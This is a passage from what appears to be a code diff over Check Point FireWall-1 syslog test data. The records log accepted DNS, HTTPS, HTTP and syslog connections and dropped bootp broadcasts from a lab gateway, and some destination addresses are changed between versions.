FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504662"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57050"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:57:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e196,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504662"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57050"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:57:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e196,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40004"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e197,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45128"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e197,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45128"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e197,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33577"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e197,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54904"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10149"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:57:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e197,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.224.227.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46650"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:57:56Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1a6,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; 
rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T17:57:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1a6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:58:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1a8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x0,0x353707c7,0xee78a1dc}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:58:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48916"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42997"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:58:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1b6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42997"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:58:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e1bb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.10.174.113"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46970"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:58:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1c8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60218"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:58:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1c8,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35594"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10150"; xlatesrc:"0.0.0.0"] 
@@ -3472,68 +3472,68 @@ <134>1 2020-03-29T18:01:25Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e277,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T18:01:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e277,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T18:01:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e278,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36943"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34432"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
